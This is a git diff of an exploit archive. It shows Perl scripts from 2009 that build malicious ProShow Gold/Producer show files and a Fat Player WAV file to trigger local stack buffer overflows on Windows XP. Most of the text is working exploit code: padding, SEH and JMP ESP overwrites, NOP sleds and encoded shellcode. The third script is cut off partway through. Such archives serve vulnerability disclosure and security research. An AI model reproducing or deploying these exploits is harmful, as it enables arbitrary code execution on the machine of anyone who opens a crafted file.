-"cell[0].images[0].colorizeStrength=10000\n".
-"cell[0].images[0].outlineColor=16777215\n".
-"cell[0].images[0].aspectX=4\n".
-"cell[0].images[0].aspectY=3\n".
-"cell[0].images[0].videoVolume=100\n".
-"cell[0].images[0].objectId=1\n".
-"cell[0].images[0].videoSpeed=100\n".
-"cell[0].images[0].nrOfKeyframes=2\n".
-"cell[0].images[0].keyframes[0].timeSegment=1\n".
-"cell[0].images[0].keyframes[0].attributeMask=-1\n".
-"cell[0].images[0].keyframes[0].zoomX=10000\n".
-"cell[0].images[0].keyframes[0].zoomY=10000\n".
-"cell[0].images[0].keyframes[0].panAccelType=1\n".
-"cell[0].images[0].keyframes[0].zoomXAccelType=1\n".
-"cell[0].images[0].keyframes[0].zoomYAccelType=1\n".
-"cell[0].images[0].keyframes[0].rotationAccelType=1\n".
-"cell[0].images[0].keyframes[0].motionSmoothness=-1\n".
-"cell[0].images[0].keyframes[0].lockAR=1\n".
-"cell[0].images[0].keyframes[0].transparency=0\n".
-"cell[0].images[0].keyframes[0].colorizeColor=8421504\n".
-"cell[0].images[0].keyframes[0].colorizeStrength=10000\n".
-"cell[0].images[0].keyframes[0].shadowOffsetX=70\n".
-"cell[0].images[0].keyframes[0].shadowOffsetY=70\n".
-"cell[0].images[0].keyframes[1].timestamp=10000\n".
-"cell[0].images[0].keyframes[1].timeSegment=3\n".
-"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n".
-"cell[0].images[0].keyframes[1].attributeMask=-1\n".
-"cell[0].images[0].keyframes[1].zoomX=10000\n".
-"cell[0].images[0].keyframes[1].zoomY=10000\n".
-"cell[0].images[0].keyframes[1].panAccelType=1\n".
-"cell[0].images[0].keyframes[1].zoomXAccelType=1\n".
-"cell[0].images[0].keyframes[1].zoomYAccelType=1\n".
-"cell[0].images[0].keyframes[1].rotationAccelType=1\n".
-"cell[0].images[0].keyframes[1].motionSmoothness=-1\n".
-"cell[0].images[0].keyframes[1].lockAR=1\n".
-"cell[0].images[0].keyframes[1].transparency=0\n".
-"cell[0].images[0].keyframes[1].colorizeColor=8421504\n".
-"cell[0].images[0].keyframes[1].colorizeStrength=10000\n".
-"cell[0].images[0].keyframes[1].shadowOffsetX=70\n".
-"cell[0].images[0].keyframes[1].shadowOffsetY=70\n".
-"cell[0].background=1\n".
-"cell[0].bgDefault=1\n".
-"cell[0].bgSizeMode=1\n".
-"cell[0].bgColorizeColor=8421504\n".
-"cell[0].sound.useDefault=1\n".
-"cell[0].sound.volume=100\n".
-"cell[0].sound.fadeIn=100\n".
-"cell[0].sound.fadeOut=100\n".
-"cell[0].sound.async=1\n".
-"cell[0].sound.musicUseDefault=1\n".
-"cell[0].sound.musicVolume=50\n".
-"cell[0].sound.musicFadeIn=100\n".
-"cell[0].sound.musicFadeOut=100\n".
-"cell[0].musicVolumeOffset=50\n".
-"cell[0].time=3000\n".
-"cell[0].transId=2\n".
-"cell[0].transTime=3000\n".
-"cell[0].includeGlobalCaptions=1\n".
-"cell[1].imageEnable=1\n".
-"cell[1].nrOfImages=1\n".
-"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n".
-"cell[1].images[0].imageEnable=1\n".
-"cell[1].images[0].name=Abstract_01\n".
-"cell[1].images[0].replaceableTemplate=1\n".
-"cell[1].images[0].sizeMode=1\n".
-"cell[1].images[0].colorizeColor=8421504\n".
-"cell[1].images[0].colorizeStrength=10000\n".
-"cell[1].images[0].outlineColor=16777215\n".
-"cell[1].images[0].aspectX=4\n".
-"cell[1].images[0].aspectY=3\n".
-"cell[1].images[0].videoVolume=100\n".
-"cell[1].images[0].objectId=2\n".
-"cell[1].images[0].videoSpeed=100\n".
-"cell[1].images[0].nrOfKeyframes=2\n".
-"cell[1].images[0].keyframes[0].timeSegment=1\n".
-"cell[1].images[0].keyframes[0].attributeMask=-1\n".
-"cell[1].images[0].keyframes[0].zoomX=10000\n".
-"cell[1].images[0].keyframes[0].zoomY=10000\n".
-"cell[1].images[0].keyframes[0].panAccelType=1\n".
-"cell[1].images[0].keyframes[0].zoomXAccelType=1\n".
-"cell[1].images[0].keyframes[0].zoomYAccelType=1\n".
-"cell[1].images[0].keyframes[0].rotationAccelType=1\n".
-"cell[1].images[0].keyframes[0].motionSmoothness=-1\n".
-"cell[1].images[0].keyframes[0].lockAR=1\n".
-"cell[1].images[0].keyframes[0].transparency=0\n".
-"cell[1].images[0].keyframes[0].colorizeColor=8421504\n".
-"cell[1].images[0].keyframes[0].colorizeStrength=10000\n".
-"cell[1].images[0].keyframes[0].shadowOffsetX=70\n".
-"cell[1].images[0].keyframes[0].shadowOffsetY=70\n".
-"cell[1].images[0].keyframes[1].timestamp=10000\n".
-"cell[1].images[0].keyframes[1].timeSegment=3\n".
-"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n".
-"cell[1].images[0].keyframes[1].attributeMask=-1\n".
-"cell[1].images[0].keyframes[1].zoomX=10000\n".
-"cell[1].images[0].keyframes[1].zoomY=10000\n".
-"cell[1].images[0].keyframes[1].panAccelType=1\n".
-"cell[1].images[0].keyframes[1].zoomXAccelType=1\n".
-"cell[1].images[0].keyframes[1].zoomYAccelType=1\n".
-"cell[1].images[0].keyframes[1].rotationAccelType=1\n".
-"cell[1].images[0].keyframes[1].motionSmoothness=-1\n".
-"cell[1].images[0].keyframes[1].lockAR=1\n".
-"cell[1].images[0].keyframes[1].transparency=0\n".
-"cell[1].images[0].keyframes[1].colorizeColor=8421504\n".
-"cell[1].images[0].keyframes[1].colorizeStrength=10000\n".
-"cell[1].images[0].keyframes[1].shadowOffsetX=70\n".
-"cell[1].images[0].keyframes[1].shadowOffsetY=70\n".
-"cell[1].background=1\n".
-"cell[1].bgDefault=1\n".
-"cell[1].bgSizeMode=1\n".
-"cell[1].bgColorizeColor=8421504\n".
-"cell[1].sound.useDefault=1\n".
-"cell[1].sound.volume=100\n".
-"cell[1].sound.fadeIn=100\n".
-"cell[1].sound.fadeOut=100\n".
-"cell[1].sound.async=1\n".
-"cell[1].sound.musicUseDefault=1\n".
-"cell[1].sound.musicVolume=50\n".
-"cell[1].sound.musicFadeIn=100\n".
-"cell[1].sound.musicFadeOut=100\n".
-"cell[1].musicVolumeOffset=50\n".
-"cell[1].time=3000\n".
-"cell[1].transId=2\n".
-"cell[1].transTime=3000\n".
-"cell[1].includeGlobalCaptions=1\n".
-"modifierCount=0\n";
-
-my $payload = $fileheader.$junk.$nseh.$seh.$nop.$shellcode.$junk2.$filefooter;
-
-print " [+] Writing payload to file\n";
-open($FILE,">$sploitfile");
-print $FILE $payload;
-close($FILE);
-print " [+] Exploit file " . $sploitfile . " created\n";
-print " [+] Wrote " . length($payload) . " bytes\n";
-
-# milw0rm.com [2009-08-24]
+#
+# [+] Vulnerability : ProShow Gold 4 BOF
+# [+] Detected by : Bkis - http://blog.bkis.com/?p=737
+# [*] Sploit coded by : corelanc0d3r (corelanc0d3r[at]gmail[dot]com)
+# [*] Sploit coded on : August 20, 2009
+# [*] Type : local
+# [*] OS : Windows
+# [*] Product : Photodex ProShow Gold
+# [*] Versions affected : 4.0
+# [*] Download link : http://www.photodex.com/downloads/go_proshowgold
+# [*] -------------------------------------------------------------------------
+# [*] Method : SEH - Universal
+# [*] Tested on : Windows XP SP3 En
+# [*] Greetz&Tx to : Saumil/SK
+# [*] -------------------------------------------------------------------------
+# MMMMM~.
+# MMMMM?.
+# MMMMMM8. .=MMMMMMM.. MMMMMMMM, MMMMMMM8. MMMMM?. MMMMMMM: MMMMMMMMMM.
+# MMMMMMMMMM=.MMMMMMMMMMM.MMMMMMMM=MMMMMMMMMM=.MMMMM?7MMMMMMMMMM: MMMMMMMMMMM:
+# MMMMMIMMMMM+MMMMM$MMMMM=MMMMMD$I8MMMMMIMMMMM~MMMMM?MMMMMZMMMMMI.MMMMMZMMMMM:
+# MMMMM==7III~MMMMM=MMMMM=MMMMM$. 8MMMMMZ$$$$$~MMMMM?..MMMMMMMMMI.MMMMM+MMMMM:
+# MMMMM=. MMMMM=MMMMM=MMMMM7. 8MMMMM? . MMMMM?NMMMM8MMMMMI.MMMMM+MMMMM:
+# MMMMM=MMMMM+MMMMM=MMMMM=MMMMM7. 8MMMMM?MMMMM:MMMMM?MMMMMIMMMMMO.MMMMM+MMMMM:
+# =MMMMMMMMMZ~MMMMMMMMMM8~MMMMM7. .MMMMMMMMMMO:MMMMM?MMMMMMMMMMMMIMMMMM+MMMMM:
+# .:$MMMMMO7:..+OMMMMMO$=.MMMMM7. ,IMMMMMMO$~ MMMMM?.?MMMOZMMMMZ~MMMMM+MMMMM:
+# .,,,.. .,,,,. .,,,,, ..,,,.. .,,,,.. .,,...,,,. .,,,,..,,,,.
+# eip hunters
+# -----------------------------------------------------------------------------
+# Script provided 'as is', without any warranty.
+# Use for educational purposes only.
+#
+print " [+] Preparing payload\n";
+my $sploitfile="proshowsploit.psh";
+my $fileheader="Photodex(R) ProShow(TM) Show File Version=0\n".
+"proshowVersion=2549\n".
+"title=Untitled ProShow 1\n".
+"fileName=proshowsploit.psh\n".
+"description=''\n".
+"showAspect=1\n".
+"showSizeX=16\n".
+"showSizeY=9\n".
+"loop=1\n".
+"loopRestart=1\n".
+"displaySizeX=704\n".
+"displaySizeY=528\n".
+"videoSizeX=720\n".
+"videoSizeY=480\n".
+"videoFrameRate=29970\n".
+"videoBitRate=1120000\n".
+"videoMuxBitRate=1394400\n".
+"outputImageSizeX=1024\n".
+"outputImageSizeY=768\n".
+"outputQuality=80\n".
+"toolbarEnable=1\n".
+"allowQuit=1\n".
+"allowPlay=1\n".
+"allowTime=1\n".
+"allowRestart=1\n".
+"allowSave=1\n".
+"allowSaveAll=1\n".
+"allowPrint=1\n".
+"allowPrintAll=1\n".
+"allowCopy=1\n".
+"allowSaver=1\n".
+"allowCta=1\n".
+"ctaLabel=ProShow Info\n".
+"ctaURL=http://www.photodex.com/\n".
+"background=1\n".
+"bgOutlineColor=0\n".
+"bgSizeMode=1\n".
+"bgColorizeColor=8421504\n".
+"waterOpacity=128\n".
+"waterZoom=10000\n".
+"waterColorizeColor=8421504\n".
+"musicVolumeOffset=100\n".
+"defaultCellVolumeOffset=100\n".
+"defaultCellFadeIn=100\n".
+"defaultCellFadeOut=100\n".
+"defaultMusicVolumeOffset=50\n".
+"defaultMusicFadeIn=100\n".
+"defaultMusicFadeOut=100\n".
+"maxDispWidth=800\n".
+"maxDispHeight=600\n".
+"maxRender=1\n".
+"maxRenderWidth=800\n".
+"maxRenderHeight=600\n".
+"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n".
+"makeFileLocalFolder=c:/\n".
+"cells=2\n".
+"cell[0].imageEnable=1\n".
+"cell[0].nrOfImages=1\n".
+"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg";
+my $junk = "A" x 6120;
+my $nseh = "\xeb\x18\x90\x90";
+my $seh = pack('V',0x01a614ea);
+my $nop="\x90" x 30;
+# windows/exec - 144 bytes
+# http://www.metasploit.com
+# Encoder: x86/shikata_ga_nai
+# EXITFUNC=seh, CMD=calc
+my $shellcode="\xda\xd1\xd9\x74\x24\xf4\x2b\xc9\xb1\x1e\xbd\x78\x41\xbf" .
+"\x6f\x58\x83\xe8\xfc\x31\x68\x14\x03\x68\x6c\xa3\x4a\x93" .
+"\x64\x67\xb5\x6c\x74\xe3\xf0\x50\xff\x8f\xff\xd0\xfe\x80" .
+"\x8b\x6e\x18\xd4\xd3\x50\x19\x01\xa2\x1b\x2d\x5e\x34\xf2" .
+"\x7c\xa0\xae\xa6\xfa\xe0\xa5\xb1\xc3\x2b\x48\xbf\x01\x40" .
+"\xa7\x84\xd1\xb3\x4c\x8e\x3c\x30\x13\x54\xbf\xac\xca\x1f" .
+"\xb3\x79\x98\x7f\xd7\x7c\x75\xf4\xfb\xf5\x88\xe0\x8a\x56" .
+"\xaf\xf2\x4f\x39\x9e\x0c\x2f\x90\x84\x7b\xe9\x2c\xce\x3c" .
+"\xf9\xc7\xa0\xa0\xac\x53\x28\xd1\x27\x9b\x2a\x21\x5d\x0c" .
+"\x45\x52\x2b\xa8\xca\xfa\xb3\x4f\x7e\xf4\x94\x50\x98\x6a" .
+"\x7b\xc3\x04\x6d";
+
+my $junk2="D" x (2000-length($shellcode));
+my $filefooter = "\ncell[0].images[0].imageEnable=1\n".
+"cell[0].images[0].name=Abstract_02\n".
+"cell[0].images[0].replaceableTemplate=1\n".
+"cell[0].images[0].sizeMode=1\n".
+"cell[0].images[0].colorizeColor=8421504\n".
+"cell[0].images[0].colorizeStrength=10000\n".
+"cell[0].images[0].outlineColor=16777215\n".
+"cell[0].images[0].aspectX=4\n".
+"cell[0].images[0].aspectY=3\n".
+"cell[0].images[0].videoVolume=100\n".
+"cell[0].images[0].objectId=1\n".
+"cell[0].images[0].videoSpeed=100\n".
+"cell[0].images[0].nrOfKeyframes=2\n".
+"cell[0].images[0].keyframes[0].timeSegment=1\n".
+"cell[0].images[0].keyframes[0].attributeMask=-1\n".
+"cell[0].images[0].keyframes[0].zoomX=10000\n".
+"cell[0].images[0].keyframes[0].zoomY=10000\n".
+"cell[0].images[0].keyframes[0].panAccelType=1\n".
+"cell[0].images[0].keyframes[0].zoomXAccelType=1\n".
+"cell[0].images[0].keyframes[0].zoomYAccelType=1\n".
+"cell[0].images[0].keyframes[0].rotationAccelType=1\n".
+"cell[0].images[0].keyframes[0].motionSmoothness=-1\n".
+"cell[0].images[0].keyframes[0].lockAR=1\n".
+"cell[0].images[0].keyframes[0].transparency=0\n".
+"cell[0].images[0].keyframes[0].colorizeColor=8421504\n".
+"cell[0].images[0].keyframes[0].colorizeStrength=10000\n".
+"cell[0].images[0].keyframes[0].shadowOffsetX=70\n".
+"cell[0].images[0].keyframes[0].shadowOffsetY=70\n".
+"cell[0].images[0].keyframes[1].timestamp=10000\n".
+"cell[0].images[0].keyframes[1].timeSegment=3\n".
+"cell[0].images[0].keyframes[1].segmentTimestamp=10000\n".
+"cell[0].images[0].keyframes[1].attributeMask=-1\n".
+"cell[0].images[0].keyframes[1].zoomX=10000\n".
+"cell[0].images[0].keyframes[1].zoomY=10000\n".
+"cell[0].images[0].keyframes[1].panAccelType=1\n".
+"cell[0].images[0].keyframes[1].zoomXAccelType=1\n".
+"cell[0].images[0].keyframes[1].zoomYAccelType=1\n".
+"cell[0].images[0].keyframes[1].rotationAccelType=1\n".
+"cell[0].images[0].keyframes[1].motionSmoothness=-1\n".
+"cell[0].images[0].keyframes[1].lockAR=1\n".
+"cell[0].images[0].keyframes[1].transparency=0\n".
+"cell[0].images[0].keyframes[1].colorizeColor=8421504\n".
+"cell[0].images[0].keyframes[1].colorizeStrength=10000\n".
+"cell[0].images[0].keyframes[1].shadowOffsetX=70\n".
+"cell[0].images[0].keyframes[1].shadowOffsetY=70\n".
+"cell[0].background=1\n".
+"cell[0].bgDefault=1\n".
+"cell[0].bgSizeMode=1\n".
+"cell[0].bgColorizeColor=8421504\n".
+"cell[0].sound.useDefault=1\n".
+"cell[0].sound.volume=100\n".
+"cell[0].sound.fadeIn=100\n".
+"cell[0].sound.fadeOut=100\n".
+"cell[0].sound.async=1\n".
+"cell[0].sound.musicUseDefault=1\n".
+"cell[0].sound.musicVolume=50\n".
+"cell[0].sound.musicFadeIn=100\n".
+"cell[0].sound.musicFadeOut=100\n".
+"cell[0].musicVolumeOffset=50\n".
+"cell[0].time=3000\n".
+"cell[0].transId=2\n".
+"cell[0].transTime=3000\n".
+"cell[0].includeGlobalCaptions=1\n".
+"cell[1].imageEnable=1\n".
+"cell[1].nrOfImages=1\n".
+"cell[1].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_01.jpg\n".
+"cell[1].images[0].imageEnable=1\n".
+"cell[1].images[0].name=Abstract_01\n".
+"cell[1].images[0].replaceableTemplate=1\n".
+"cell[1].images[0].sizeMode=1\n".
+"cell[1].images[0].colorizeColor=8421504\n".
+"cell[1].images[0].colorizeStrength=10000\n".
+"cell[1].images[0].outlineColor=16777215\n".
+"cell[1].images[0].aspectX=4\n".
+"cell[1].images[0].aspectY=3\n".
+"cell[1].images[0].videoVolume=100\n".
+"cell[1].images[0].objectId=2\n".
+"cell[1].images[0].videoSpeed=100\n".
+"cell[1].images[0].nrOfKeyframes=2\n".
+"cell[1].images[0].keyframes[0].timeSegment=1\n".
+"cell[1].images[0].keyframes[0].attributeMask=-1\n".
+"cell[1].images[0].keyframes[0].zoomX=10000\n".
+"cell[1].images[0].keyframes[0].zoomY=10000\n".
+"cell[1].images[0].keyframes[0].panAccelType=1\n".
+"cell[1].images[0].keyframes[0].zoomXAccelType=1\n".
+"cell[1].images[0].keyframes[0].zoomYAccelType=1\n".
+"cell[1].images[0].keyframes[0].rotationAccelType=1\n".
+"cell[1].images[0].keyframes[0].motionSmoothness=-1\n".
+"cell[1].images[0].keyframes[0].lockAR=1\n".
+"cell[1].images[0].keyframes[0].transparency=0\n".
+"cell[1].images[0].keyframes[0].colorizeColor=8421504\n".
+"cell[1].images[0].keyframes[0].colorizeStrength=10000\n".
+"cell[1].images[0].keyframes[0].shadowOffsetX=70\n".
+"cell[1].images[0].keyframes[0].shadowOffsetY=70\n".
+"cell[1].images[0].keyframes[1].timestamp=10000\n".
+"cell[1].images[0].keyframes[1].timeSegment=3\n".
+"cell[1].images[0].keyframes[1].segmentTimestamp=10000\n".
+"cell[1].images[0].keyframes[1].attributeMask=-1\n".
+"cell[1].images[0].keyframes[1].zoomX=10000\n".
+"cell[1].images[0].keyframes[1].zoomY=10000\n".
+"cell[1].images[0].keyframes[1].panAccelType=1\n".
+"cell[1].images[0].keyframes[1].zoomXAccelType=1\n".
+"cell[1].images[0].keyframes[1].zoomYAccelType=1\n".
+"cell[1].images[0].keyframes[1].rotationAccelType=1\n".
+"cell[1].images[0].keyframes[1].motionSmoothness=-1\n".
+"cell[1].images[0].keyframes[1].lockAR=1\n".
+"cell[1].images[0].keyframes[1].transparency=0\n".
+"cell[1].images[0].keyframes[1].colorizeColor=8421504\n".
+"cell[1].images[0].keyframes[1].colorizeStrength=10000\n".
+"cell[1].images[0].keyframes[1].shadowOffsetX=70\n".
+"cell[1].images[0].keyframes[1].shadowOffsetY=70\n".
+"cell[1].background=1\n".
+"cell[1].bgDefault=1\n".
+"cell[1].bgSizeMode=1\n".
+"cell[1].bgColorizeColor=8421504\n".
+"cell[1].sound.useDefault=1\n".
+"cell[1].sound.volume=100\n".
+"cell[1].sound.fadeIn=100\n".
+"cell[1].sound.fadeOut=100\n".
+"cell[1].sound.async=1\n".
+"cell[1].sound.musicUseDefault=1\n".
+"cell[1].sound.musicVolume=50\n".
+"cell[1].sound.musicFadeIn=100\n".
+"cell[1].sound.musicFadeOut=100\n".
+"cell[1].musicVolumeOffset=50\n".
+"cell[1].time=3000\n".
+"cell[1].transId=2\n".
+"cell[1].transTime=3000\n".
+"cell[1].includeGlobalCaptions=1\n".
+"modifierCount=0\n";
+
+my $payload = $fileheader.$junk.$nseh.$seh.$nop.$shellcode.$junk2.$filefooter;
+
+print " [+] Writing payload to file\n";
+open($FILE,">$sploitfile");
+print $FILE $payload;
+close($FILE);
+print " [+] Exploit file " . $sploitfile . " created\n";
+print " [+] Wrote " . length($payload) . " bytes\n";
+
+# milw0rm.com [2009-08-24]
diff --git a/platforms/windows/local/9495.pl b/platforms/windows/local/9495.pl
index 2846291f9..bda8633e2 100755
--- a/platforms/windows/local/9495.pl
+++ b/platforms/windows/local/9495.pl
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# by ahwak2000
-# email: 0.w[at]w.cn
-#Tested on Windows XP SP3 (English)
-# Fat Player 0.6b(wav) Universal Local Buffer Exploit
-#http://sourceforge.net/projects/fatplayer/
-###################################################################
-my $shellcode=
-"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49".
-"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56".
-"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41".
-"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42".
-"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a".
-"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47".
-"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c".
-"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a".
-"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46".
-"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45".
-"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c".
-"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c".
-"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44".
-"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c".
-"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46".
-"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50".
-"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44".
-"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45".
-"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43".
-"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b".
-"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43".
-"\x51\x42\x4c\x42\x43\x43\x30\x41\x41";
-###################################################################
-my $overflow="\x41" x 4124;
-my $sh= "\xEB\x09\x90\x90";#short jump
-my $jmp="\x1F\x22\x44\x00";# Universal -- 004422 . 
FFE4 JMP ESP
-my $nop="\x90" x 20;
-###################################################################
-open(myfile,'>> ahwak2000.wav');
-print myfile $overflow.$sh.$jmp.$nop.$shellcode;
-###################################################################
-
-# milw0rm.com [2009-08-24]
+#!/usr/bin/perl
+# by ahwak2000
+# email: 0.w[at]w.cn
+#Tested on Windows XP SP3 (English)
+# Fat Player 0.6b(wav) Universal Local Buffer Exploit
+#http://sourceforge.net/projects/fatplayer/
+###################################################################
+my $shellcode=
+"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49".
+"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56".
+"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41".
+"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42".
+"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a".
+"\x48\x47\x34\x43\x30\x45\x50\x45\x50\x4c\x4b\x51\x55\x47".
+"\x4c\x4c\x4b\x43\x4c\x45\x55\x42\x58\x45\x51\x4a\x4f\x4c".
+"\x4b\x50\x4f\x45\x48\x4c\x4b\x51\x4f\x51\x30\x43\x31\x4a".
+"\x4b\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46".
+"\x51\x49\x50\x4c\x59\x4e\x4c\x4d\x54\x49\x50\x42\x54\x45".
+"\x57\x49\x51\x49\x5a\x44\x4d\x43\x31\x48\x42\x4a\x4b\x4c".
+"\x34\x47\x4b\x50\x54\x47\x54\x45\x54\x43\x45\x4b\x55\x4c".
+"\x4b\x51\x4f\x47\x54\x45\x51\x4a\x4b\x45\x36\x4c\x4b\x44".
+"\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x4c".
+"\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4c\x49\x51\x4c\x46".
+"\x44\x44\x44\x48\x43\x51\x4f\x50\x31\x4a\x56\x45\x30\x50".
+"\x56\x42\x44\x4c\x4b\x51\x56\x50\x30\x4c\x4b\x51\x50\x44".
+"\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x43\x58\x45".
+"\x58\x4b\x39\x4a\x58\x4d\x53\x49\x50\x42\x4a\x50\x50\x43".
+"\x58\x4a\x50\x4d\x5a\x44\x44\x51\x4f\x45\x38\x4a\x38\x4b".
+"\x4e\x4c\x4a\x44\x4e\x50\x57\x4b\x4f\x4d\x37\x42\x43\x43".
+"\x51\x42\x4c\x42\x43\x43\x30\x41\x41";
+###################################################################
+my $overflow="\x41" x 4124;
+my $sh= "\xEB\x09\x90\x90";#short jump
+my $jmp="\x1F\x22\x44\x00";# Universal -- 004422 . FFE4 JMP ESP
+my $nop="\x90" x 20;
+###################################################################
+open(myfile,'>> ahwak2000.wav');
+print myfile $overflow.$sh.$jmp.$nop.$shellcode;
+###################################################################
+
+# milw0rm.com [2009-08-24]
diff --git a/platforms/windows/local/9519.pl b/platforms/windows/local/9519.pl
index 1cdc59296..f5e8e7ef7 100755
--- a/platforms/windows/local/9519.pl
+++ b/platforms/windows/local/9519.pl
@@ -1,226 +1,226 @@ -#!/usr/bin/perl -# by hack4love -# hack4love@hotmail.com -# ProShow Producer //ProShow Gold v 4.0.2549(.psh) Universal Local BOF SEH -########################################################################## -##http://files.photodex.com/release/psgold_40_2549.exe -##http://files.photodex.com/release/pspro_40_2549.exe -########################################################################### -##THIS EXPLOIT WORK SO GOOD FOR THE TWO PROGRAM############################ -########################################################################### -##FIRST WAS BY corelanc0d3r################################################ -########################################################################### -my $header="Photodex(R) ProShow(TM) Show File Version=0\n". -"proshowVersion=2549\n". -"title=Untitled ProShow 1\n". -"fileName=proshowsploit.psh\n". -"description=''\n". -"showAspect=1\n". -"showSizeX=16\n". -"showSizeY=9\n". -"loop=1\n". -"loopRestart=1\n". -"displaySizeX=704\n". -"displaySizeY=528\n". -"videoSizeX=720\n". -"videoSizeY=480\n". -"videoFrameRate=29970\n". -"videoBitRate=1120000\n". -"videoMuxBitRate=1394400\n". -"outputImageSizeX=1024\n". -"outputImageSizeY=768\n". -"outputQuality=80\n". -"toolbarEnable=1\n". -"allowQuit=1\n". -"allowPlay=1\n". -"allowTime=1\n". -"allowRestart=1\n". -"allowSave=1\n". -"allowSaveAll=1\n". -"allowPrint=1\n". -"allowPrintAll=1\n". -"allowCopy=1\n". -"allowSaver=1\n". -"allowCta=1\n". -"ctaLabel=ProShow Info\n". -"ctaURL=http://www.photodex.com/\n". -"background=1\n". -"bgOutlineColor=0\n". -"bgSizeMode=1\n". -"bgColorizeColor=8421504\n". -"waterOpacity=128\n". -"waterZoom=10000\n". -"waterColorizeColor=8421504\n". -"musicVolumeOffset=100\n". -"defaultCellVolumeOffset=100\n". -"defaultCellFadeIn=100\n". -"defaultCellFadeOut=100\n". -"defaultMusicVolumeOffset=50\n". -"defaultMusicFadeIn=100\n". -"defaultMusicFadeOut=100\n". -"maxDispWidth=800\n". -"maxDispHeight=600\n". -"maxRender=1\n". 
-"maxRenderWidth=800\n". -"maxRenderHeight=600\n". -"randomTransitions=FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF:FFFFFFFF\n". -"makeFileLocalFolder=c:/\n". -"cells=2\n". -"cell[0].imageEnable=1\n". -"cell[0].nrOfImages=1\n". -"cell[0].images[0].image=../../../../../Media Sources/ProShow Gold - Built-In Content/Backgrounds/Abstract_02.jpg"; -#################################################################################### -my $bof="\x41" x 6151; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\xf9\x4c\x1a\x10";####Universal ##if.dnt -my $nop="\x90" x 20; -my $sec= -"\x2b\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc2". -"\xf8\x23\x02\x83\xeb\xfc\xe2\xf4\x3e\x10\x67\x02\xc2\xf8\xa8\x47". -"\xfe\x73\x5f\x07\xba\xf9\xcc\x89\x8d\xe0\xa8\x5d\xe2\xf9\xc8\x4b". -"\x49\xcc\xa8\x03\x2c\xc9\xe3\x9b\x6e\x7c\xe3\x76\xc5\x39\xe9\x0f". -"\xc3\x3a\xc8\xf6\xf9\xac\x07\x06\xb7\x1d\xa8\x5d\xe6\xf9\xc8\x64". -"\x49\xf4\x68\x89\x9d\xe4\x22\xe9\x49\xe4\xa8\x03\x29\x71\x7f\x26". -"\xc6\x3b\x12\xc2\xa6\x73\x63\x32\x47\x38\x5b\x0e\x49\xb8\x2f\x89". -"\xb2\xe4\x8e\x89\xaa\xf0\xc8\x0b\x49\x78\x93\x02\xc2\xf8\xa8\x6a". -"\xfe\xa7\x12\xf4\xa2\xae\xaa\xfa\x41\x38\x58\x52\xaa\x08\xa9\x06". -"\x9d\x90\xbb\xfc\x48\xf6\x74\xfd\x25\x9b\x42\x6e\xa1\xf8\x23\x02"; -############################################################################### -my $header2 = "\ncell[0].images[0].imageEnable=1\n". -"cell[0].images[0].name=Abstract_02\n". -"cell[0].images[0].replaceableTemplate=1\n". -"cell[0].images[0].sizeMode=1\n". -"cell[0].images[0].colorizeColor=8421504\n". -"cell[0].images[0].colorizeStrength=10000\n". -"cell[0].images[0].outlineColor=16777215\n". 